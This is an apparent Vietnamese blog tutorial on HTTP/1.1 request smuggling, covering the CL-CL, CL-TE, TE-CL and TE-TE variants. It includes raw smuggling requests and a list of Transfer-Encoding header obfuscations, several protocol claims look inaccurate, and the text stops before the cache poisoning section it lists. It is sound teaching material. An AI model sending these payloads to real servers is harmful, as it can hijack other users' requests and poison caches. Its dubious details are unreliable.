<!DOCTYPE html>
<html lang="en">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  <link rel="icon" href="https://i.pinimg.com/564x/07/87/e7/0787e75ed249720cdb85f6918c609f61.jpg">
  
  <title>Khái niệm cơ bản về HTTP request smuggling với HTTP/1.1 | Rayinaw</title>
  <meta name="author" content="Rayinaw" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="HRS" />
  
  <meta name="description" content="Lời nói đầu:Bài viết này là về khái niệm và cách HRS xảy ra đối với HTTP&#x2F;1.1, với HTTP&#x2F;2.0 và thực hành các bạn có thể xem ở bài viết sau. Một vài kiến thức cần nắm:Keep-Alive và Pipelining:">
<meta property="og:type" content="article">
<meta property="og:title" content="Khái niệm cơ bản về HTTP request smuggling với HTTP&#x2F;1.1">
<meta property="og:url" content="https://rayinaw.github.io/2022/11/30/http-request-smuggling-HTTP-1.1/index.html">
<meta property="og:site_name" content="Rayinaw">
<meta property="og:description" content="Lời nói đầu:Bài viết này là về khái niệm và cách HRS xảy ra đối với HTTP&#x2F;1.1, với HTTP&#x2F;2.0 và thực hành các bạn có thể xem ở bài viết sau. Một vài kiến thức cần nắm:Keep-Alive và Pipelining:">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.pinimg.com/564x/07/87/e7/0787e75ed249720cdb85f6918c609f61.jpg">
<meta property="article:published_time" content="2022-11-30T03:36:10.000Z">
<meta property="article:modified_time" content="2022-12-02T18:34:47.547Z">
<meta property="article:author" content="Rayinaw">
<meta property="article:tag" content="HRS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.pinimg.com/564x/07/87/e7/0787e75ed249720cdb85f6918c609f61.jpg">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Rayinaw" type="application/atom+xml">
</head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                        
                                            <li><a href="/"><i class="fa fa-home"></i>Trang chủ</a></li>
                                        
                                    
                                        
                                            <li><a href="/archives/"><i class="fa fa-book"></i>Kho lưu trữ</a></li>
                                        
                                    
                                        
                                            <li><a href="/about/"><i class="fa fa-paper-plane"></i>Về mình</a></li>
                                        
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">Rayinaw</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>Rayinaw</h2> <br />
                        <span>Nơi mình ghi chú lại những thứ đã học.</span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="https://rayinaw.github.io/2022/11/30/http-request-smuggling-HTTP-1.1/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">Khái niệm cơ bản về HTTP request smuggling với HTTP/1.1</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2022-11-30T03:36:10.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2022-11-30</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> Tác giả <span itemprop="name">Rayinaw</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~11.51K
                    
                    từ
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>Bài viết này được chỉnh sửa lần cuối vào <time datetime="1670006087547"></time> trước, và có thể cần cập nhật。</p></div>
            </div>
            
            
            
                <div class="kratos-post-inner-toc toc-div-class" >
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Loi-noi-dau"><span class="toc-number">1.</span> <span class="toc-text">Lời nói đầu:</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Mot-vai-kien-thuc-can-nam"><span class="toc-number">2.</span> <span class="toc-text">Một vài kiến thức cần nắm:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Keep-Alive-va-Pipelining"><span class="toc-number">2.1.</span> <span class="toc-text">Keep-Alive và Pipelining:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Content-Length-va-Transfer-Encoding"><span class="toc-number">2.2.</span> <span class="toc-text">Content-Length và Transfer-Encoding:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Content-Length"><span class="toc-number">2.2.1.</span> <span class="toc-text">Content-Length:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Transfer-Encoding"><span class="toc-number">2.2.2.</span> <span class="toc-text">Transfer-Encoding:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Reverse-proxy"><span class="toc-number">2.3.</span> <span class="toc-text">Reverse proxy:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Khai-niem-web-cache"><span class="toc-number">2.4.</span> <span class="toc-text">Khái niệm web cache:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Co-mot-so-loai-web-cache-nhu-sau"><span class="toc-number">2.4.1.</span> <span class="toc-text">Có một số loại web cache như sau:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Yeu-cau-cua-loi-HRS"><span class="toc-number">2.5.</span> <span class="toc-text">Yêu cầu của lỗi HRS:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HTTP-request-smuggling-o-HTTP-x2F-1-1"><span class="toc-number">3.</span> <span class="toc-text">HTTP request smuggling ở HTTP&#x2F;1.1</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-Content-Length-khong-bang-0"><span class="toc-number">3.1.</span> <span class="toc-text">CL(Content-Length) không bằng 0:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-CL"><span class="toc-number">3.2.</span> <span class="toc-text">CL-CL:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CL-TE"><span class="toc-number">3.3.</span> <span class="toc-text">CL-TE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TE-CL"><span class="toc-number">3.4.</span> <span class="toc-text">TE-CL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TE-TE"><span class="toc-number">3.5.</span> <span class="toc-text">TE-TE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web-cache-poisoning-thong-qua-HRS"><span class="toc-number">3.6.</span> <span class="toc-text">Web cache poisoning thông qua HRS:</span></a></li></ol></li></ol>
                </div>
            
            <hr />
            <div itemprop="articleBody"><h1 id="Loi-noi-dau"><a href="#Loi-noi-dau" class="headerlink" title="Lời nói đầu:"></a>Lời nói đầu:</h1><p>Bài viết này là về khái niệm và cách HRS xảy ra đối với HTTP&#x2F;1.1, với HTTP&#x2F;2.0 và thực hành các bạn có thể xem ở bài viết sau.</p>
<h1 id="Mot-vai-kien-thuc-can-nam"><a href="#Mot-vai-kien-thuc-can-nam" class="headerlink" title="Một vài kiến thức cần nắm:"></a>Một vài kiến thức cần nắm:</h1><h2 id="Keep-Alive-va-Pipelining"><a href="#Keep-Alive-va-Pipelining" class="headerlink" title="Keep-Alive và Pipelining:"></a>Keep-Alive và Pipelining:</h2><p>Keep-Alive và Pipelining được giới thiệu trong RFC-2616:<br><code>Keep-Alive</code> cho phép một kết nối TCP giữa Client và Server được tiếp tục gửi và nhận HTTP requests và responses thay vì mở lại kết nối sau mỗi lần Client yêu cầu. Theo như mình thấy thì một số server sẽ set out timeout cho một kết nối keep-alive, sau khi user 1 yêu cầu đến server và server gửi response về, kết nối vẫn được mở và user khác có thể sử dụng kết nối này. Để bật mode Keep-Alive chúng ta cần thêm trường <code>Connection: Keep-Alive</code> vào request.</p>
<p><code>Pipelining</code> cho phép client gửi nhiều yêu cầu HTTP một lúc mà không cần đợi phản hồi của server thông qua một kết nối TCP được mở, server sẽ phản hồi theo thứ tự mà request được gửi đi. Để bật mode Pipeline chúng ta cần thêm trường <code>Connection: Pipelining</code> vào request.</p>
<h2 id="Content-Length-va-Transfer-Encoding"><a href="#Content-Length-va-Transfer-Encoding" class="headerlink" title="Content-Length và Transfer-Encoding:"></a>Content-Length và Transfer-Encoding:</h2><h3 id="Content-Length"><a href="#Content-Length" class="headerlink" title="Content-Length:"></a>Content-Length:</h3><p>Đối với một yêu cầu POST, bắt buộc phải có 1 hoặc hơn trong 3 phương thức <code>Content-Length</code>, <code>Transfer-Encoding</code>, <code>Content-Type</code> và đương nhiên nó phải đúng định dạng.</p>
<p><code>Content-Length</code> đề cập đến kích thước phần body của một yêu cầu HTTP tính bằng byte. Nếu một tệp văn bản được nén, thì Content-Length của nó sẽ là kích thước được nén. Tiêu đề <code>Content-Length</code> chỉ có ở POST request vì nó có trường nội dung còn GET request thì không.</p>
<h3 id="Transfer-Encoding"><a href="#Transfer-Encoding" class="headerlink" title="Transfer-Encoding:"></a>Transfer-Encoding:</h3><p><code>Transfer-Encoding</code> chỉ ra kiểu truyền tải nào được sử dụng để truyền tải nội dung(phần body). Transfer-Encoding có nhiều kiểu truyền tải, nhưng với lỗi HRS chúng ta chỉ cần chú ý đến phương thức <code>Transfer-Encoding: chunked</code>.</p>
<p>Với <code>Transfer-Encoding: chunked</code> Dữ liệu body sẽ được truyền theo từng khối. Bắt đầu bởi một số hex biểu thị số byte của nội dung đầu tiên, tiếp theo sau là data. Tiếp đến là lần lượt những đoạn hex, data như vậy. Để kết thúc nội dung byte cuối cùng sẽ là 0 và theo sau là \r\n. Một \r\n được gọi là một CRLF, độ dài không bao gồm CRLF. Ví dụ:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">Nguồn wiki.</span><br><span class="line"><span class="number">4</span>\r\<span class="title function_ invoke__">n</span>        (bytes to send)</span><br><span class="line">Wiki\r\<span class="title function_ invoke__">n</span>     (data)</span><br><span class="line"><span class="number">6</span>\r\<span class="title function_ invoke__">n</span>        (bytes to send)</span><br><span class="line">pedia \r\<span class="title function_ invoke__">n</span>   (data)</span><br><span class="line">E\r\<span class="title function_ invoke__">n</span>        (bytes to send)</span><br><span class="line">in \r\n</span><br><span class="line">\r\n</span><br><span class="line">chunks.\r\<span class="title function_ invoke__">n</span>  (data)</span><br><span class="line"><span class="number">0</span>\r\<span class="title function_ invoke__">n</span>        (<span class="keyword">final</span> byte - <span class="number">0</span>)</span><br><span class="line">\r\<span class="title function_ invoke__">n</span>         (end message)</span><br></pre></td></tr></table></figure>
<p>Ở phương thức Transfer-Encoding chúng ta cần nắm cách đếm byte:</p>
<ul>
<li>Nếu dữ liệu trên 1 dòng thì không cần đếm \r\n sau nó.</li>
<li>Nếu dữ liệu nhiều dòng như dòng <code>E\r\n (bytes to send)</code> ở trên thì chúng ta cần đếm hết kể cả \r \n (lưu ý \r hay \n chỉ tính là 1 byte), ở dòng cuối cùng của khối data này có \r\n chúng ta sẽ không đếm nó vào.</li>
<li>Sau đó chuyển độ dài thành số hex tương ứng.</li>
</ul>
<h2 id="Reverse-proxy"><a href="#Reverse-proxy" class="headerlink" title="Reverse proxy:"></a>Reverse proxy:</h2><p>Reverse Proxy là một loại proxy server, nó đóng vai trò như một server bình thường. Nó tiếp nhận yêu cầu từ user, rồi chuyển tiếp đến các máy chủ khác xử lý yêu cầu đó rồi trả về cho người dùng. Người dùng ở đây chỉ giao tiếp với reverse proxy server mà không biết về sự tồn tại của máy chủ khác.<br>Cấu trúc của một request từ user đến một máy chủ có tồn tại reverse proxy như sau:<br>user —request—&gt; reverse proxy —request—&gt; back-end server<br>user &lt;–response— reverse proxy &lt;–response— back-end server</p>
<h2 id="Khai-niem-web-cache"><a href="#Khai-niem-web-cache" class="headerlink" title="Khái niệm web cache:"></a>Khái niệm web cache:</h2><p>Web cache sinh ra để nâng cao trải nghiệm người dùng. Khi người dùng yêu cầu như những dữ liệu như HTML, CSS, Javascript, image,…, server có thể sẽ lưu vào web cache để không phải thực hiện lại những truy vấn để lấy những dữ liệu đó, giúp cho việc lấy dữ liệu nhanh hơn, đỡ tốn tài nguyên hơn cho người dùng.</p>
<h3 id="Co-mot-so-loai-web-cache-nhu-sau"><a href="#Co-mot-so-loai-web-cache-nhu-sau" class="headerlink" title="Có một số loại web cache như sau:"></a>Có một số loại web cache như sau:</h3><p>Web cache ở phía browser: Sau khi người dùng thực hiện request lần đầu tiên đến server, nếu server hỗ trợ cache ở browser người dùng, dữ liệu sẽ được lưu vào cache ở browser của người dùng (nên xóa lịch sử web hay có mục cache). Khi người dùng request những lần tiếp theo tương tự như yêu cầu đầu tiên, browser chỉ cần lấy từ cache của browser để render ra cho người dùng.<br>Web cache phía Proxy Server: Nó thường là CDN caching. Nó hoạt động tương tự như browser caching tuy nhiên nơi lưu trữ cache ở đây là CDN server trên toàn thế giới. Ở đây nhiều user có thể dùng chung cache từ server gửi đến máy chủ CDN. Cách hoạt động các bạn có thể tham khảo thêm ở <a target="_blank" rel="noopener" href="https://viblo.asia/p/cdn-content-delivery-network-caching-Qpmle2O75rd">đây</a>.<br>Web cache phía Reverse Proxy server: Cũng hoạt động tương tự như hai kiểu trên, tuy nhiên cache được lưu trữ ở phía Reverse Proxy.<br>Video tham khảo thêm về web cache:</p>
<div class="video-container"><iframe src="https://www.youtube.com/embed/HiBDZgTNpXY" frameborder="0" loading="lazy" allowfullscreen></iframe></div> 
<h2 id="Yeu-cau-cua-loi-HRS"><a href="#Yeu-cau-cua-loi-HRS" class="headerlink" title="Yêu cầu của lỗi HRS:"></a>Yêu cầu của lỗi HRS:</h2><p>Để một lỗi HRS xảy ra, trang web cần đáp ứng những yêu cầu sau:</p>
<ul>
<li>Trang web bao gồm hai máy chủ front-end (reverse proxy) và máy chủ back-end.</li>
<li>Máy chủ phải hỗ trợ Keep-Alive hoặc Pipelining để yêu cầu có thể gắn với yêu cầu của nạn nhân (Nếu bạn không hiểu thì cứ bỏ qua, đọc phần sau sẽ hiểu)</li>
<li>Máy chủ front-end và back-end phân tích các trường <code>Transfer-Encoding</code>, <code>Content-Length</code> không nghiêm ngặt khiến cho quá trình phân tích mắc sai lầm phát sinh lỗi.</li>
</ul>
<h1 id="HTTP-request-smuggling-o-HTTP-x2F-1-1"><a href="#HTTP-request-smuggling-o-HTTP-x2F-1-1" class="headerlink" title="HTTP request smuggling ở HTTP&#x2F;1.1"></a>HTTP request smuggling ở HTTP&#x2F;1.1</h1><h2 id="CL-Content-Length-khong-bang-0"><a href="#CL-Content-Length-khong-bang-0" class="headerlink" title="CL(Content-Length) không bằng 0:"></a>CL(Content-Length) không bằng 0:</h2><p>GET mang nội dung thì khá lạ, nhưng mà này thực sự xảy ra. Khá khó hiểu với mình. Vấn đề:</p>
<ul>
<li>Máy chủ proxy cho phép yêu cầu GET mang nội dung, nhưng máy chủ phía sau không cho phép mang nội dung request, máy chủ phía sau sẽ trực tiếp bỏ trường Content-Length và không xử lý nó. Từ đây nó sẽ phát sinh ra lỗi HRS.<br>Ví dụ:<br>Một request như sau:<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br><span class="line">Content-Length: <span class="number">44</span>\r\n</span><br><span class="line"> </span><br><span class="line">GET /secret HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
Máy chủ Proxy nhận được yêu cầu, như mình đã nói, vì một lý do nào đó mà request này được chấp nhận ở máy chủ Proxy mình không biết :). Nó sẽ chuyển đến máy chủ phía sau, tại đây nó không chấp nhận trường Content-Length nên nó sẽ xem như là yêu cầu riêng biệt, và nếu máy chủ có sử dụng <code>pipelining</code>, nó sẽ xem như là hai yêu cầu riêng biệt.<br>Yêu cầu thứ nhất:<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure>
Yêu cầu thứ hai:<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET / secret HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure></li>
</ul>
<h2 id="CL-CL"><a href="#CL-CL" class="headerlink" title="CL-CL:"></a>CL-CL:</h2><p>Kĩ thuật tấn công CL-CL là một yêu cầu HTTP chứa 2 trường Content-Length. Theo <img src="https://www.rfc-editor.org/rfc/rfc7230#section-3.3.3" alt="RFC-7230">, nếu máy chủ nhận được hai yêu cầu Content-Length và giá trị của 2 yêu cầu đó khác nhau thì nó sẽ trả về lỗi 400. Tuy nhiên đôi lúc sẽ có những máy chủ không tuân thủ nghiêm ngặt thông số này và dẫn đến HRS.</p>
<p>Giả sử một kịch bản tấn công sẽ là cả máy chủ proxy và máy chủ gốc đề không trả về lỗi 400, và máy chủ proxy sử dụng trường <code>Content-Length</code> đầu tiên và máy chủ gốc sử dụng trường <code>Content-Length</code> thứ hai.</p>
<p>Ví dụ một request như sau:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br><span class="line">Content-Length: <span class="number">8</span>\r\n</span><br><span class="line">Content-Length: <span class="number">7</span>\r\n</span><br><span class="line"> </span><br><span class="line"><span class="number">12345</span>\r\n</span><br><span class="line">a</span><br></pre></td></tr></table></figure>
<p>Phân tích:</p>
<ul>
<li>Máy chủ proxy nhận <code>Content-Length: 8\r\n</code>, dòng thứ 5 trống là một dòng thông thường của yêu cầu POST nên không tính vào phần nội dung, <code>12345 + \r + \n + a = 8 bytes</code> thõa mãn với trường <code>Content-Length</code>nên nó chuyển tiếp yêu cầu đến máy chủ back-end.</li>
<li>Máy chủ Back-End nhận trường <code>Content-Length: 7\r\n</code>, sau khi đọc 7 kí tự đầu tiên là hết dòng thứ 6, máy chủ Back-End cho rằng quá trình đọc đã hoàn thành sau đó gửi response về cho client. Lúc này trong bộ đệm còn một kí tự <code>a</code>, máy chủ back-end sẽ xem như đây là một phần của yêu cầu (request) tiếp theo.</li>
</ul>
<p>Bây giờ giả sử như có một người dùng khác gửi một yêu cầu đến máy chủ:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET /index.html HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure>
<p>Dựa trên việc sử dụng lại kết nối TCP giữa máy chủ proxy và máy chủ back-end, <code>a</code> sẽ được kết hợp với yêu cầu này để tạo thành một yêu cầu mới:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">aGET /index.html HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure>

<p>Lúc này tại máy khách sẽ nhận được một lỗi <code>aGET request method not found</code>, cho chúng ta biết được rằng HRS đã xảy ra.</p>
<h2 id="CL-TE"><a href="#CL-TE" class="headerlink" title="CL-TE"></a>CL-TE</h2><p>Trong trường hợp này, máy chủ Front-End sử dụng <code>Content-Length</code> và máy chủ Back-End sử dụng <code>Transfer-Encoding</code>.</p>
<p>Giả sử một yêu cầu như sau:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br><span class="line">Connection: keep-alive\r\n</span><br><span class="line">Content-Length: <span class="number">6</span>\r\n</span><br><span class="line">Transfer-Encoding: chunked\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line">a</span><br></pre></td></tr></table></figure>

<p>Máy chủ Front-End nhận trường <code>Content-Length: 6\r\n</code>, dòng thứ 6 không tính vào <code>Content-Length</code>, dòng 7-9 có <code>0 + \r\n + \r\n + a = 6 bytes</code> thõa mãn, nên yêu cầu được chuyển đến máy chủ back-end.<br>Máy chủ Back-End nhận <code>Transfer-Encoding: chunked\r\n</code>, khi nhận được cờ <code>0\r\n</code> và dòng sau là <code>\r\n</code> máy chủ sẽ xem như là phần body đã kết thúc và lúc này kí tự a vẫn còn nằm trong bộ đệm.</p>
<p>Tương tự như CL-CL nếu bây giờ có một yêu cầu gửi đến:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure>
<p>Nó sẽ gộp kí tự <code>a</code> với request này thành:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">aPOST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br></pre></td></tr></table></figure>
<p>Và client sẽ nhận lỗi <code>Unrecognized method aPOST</code> có nghĩa là HRS đã xảy ra.</p>
<h2 id="TE-CL"><a href="#TE-CL" class="headerlink" title="TE-CL"></a>TE-CL</h2><p>Máy chủ Front-End sử dụng tiêu đề <code>Transfer-Encoding</code>, máy chủ Back-End sử dụng tiêu đề <code>Content-Length</code>.<br>Xét request như sau:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">Host: example.com\r\n</span><br><span class="line">Content-Length: <span class="number">4</span>\r\n</span><br><span class="line">Transfer-Encoding: chunked\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">12</span>\r\n</span><br><span class="line">aPOST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>

<p>Máy chủ front-end nhận <code>Transfer-Encoding: chunked\r\n</code>, khi đọc đến <code>0\r\n</code> và <code>\r\n</code>ở cuối, không có vấn đề gì xảy ra nên máy chủ front-end request đến máy chủ back-end.<br>Máy chủ back-end nhận trường <code>Content-Length: 4\r\n</code>, vì độ dày chỉ 4 bytes tương đương 12 + \r + \r là đến hết dòng thứ 6, máy chủ back-end sẽ xem là đã kết thúc request và phần còn lại từ dòng 7 trở đi không được xử lý và máy chủ back-end sẽ coi đây là phần bắt đầu của yêu cầu tiếp theo.</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">aPOST / HTTP/<span class="number">1.1</span>\r\n</span><br><span class="line">\r\n</span><br><span class="line"><span class="number">0</span>\r\n</span><br><span class="line">\r\n</span><br></pre></td></tr></table></figure>
<p>Tại thời điểm này nếu có một yêu cầu khác nó sẽ báo lỗi <code>Unrecognized method aPOST</code>, có nghĩa là HRS đã thành công.</p>
<h2 id="TE-TE"><a href="#TE-TE" class="headerlink" title="TE-TE"></a>TE-TE</h2><p>Cả máy chủ front-end và máy chủ back-end đều sử dụng <code>Transfer-Encoding</code> nhưng bằng một cách nào đó chúng ta có thể gây nhầm lẫn cho máy chủ để một trong hai máy chủ front-end và back-end không xử lý <code>Transfer-Encoding</code> như bình thường, khi đó chúng ta có thể khai thác lỗ hỏng CL-TE hoặc TE-CL tùy theo cách xử lý của reverse proxy và back-end.</p>
<p>Một số cách để gây rối cho máy chủ như sau:</p>
<figure class="highlight h"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">Transfer-Encoding: xchunked</span><br><span class="line">Transfer-Encoding : chunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Transfer-Encoding: x</span><br><span class="line"></span><br><span class="line">Transfer-Encoding:[tab]chunked</span><br><span class="line"></span><br><span class="line">[space]Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">X: X[\n]Transfer-Encoding: chunked</span><br><span class="line">Transfer-Encoding: xchunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding : chunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Transfer-Encoding: x</span><br><span class="line"></span><br><span class="line">Transfer-Encoding:[tab]chunked</span><br><span class="line"></span><br><span class="line">[space]Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">X: X[\n]Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Transfer-encoding: cow</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Transfer-Encoding</span><br><span class="line">: chunked</span><br><span class="line">Transfer-Encoding</span><br><span class="line">: chunked</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Giả sử chúng ta có một request như sau:</p>
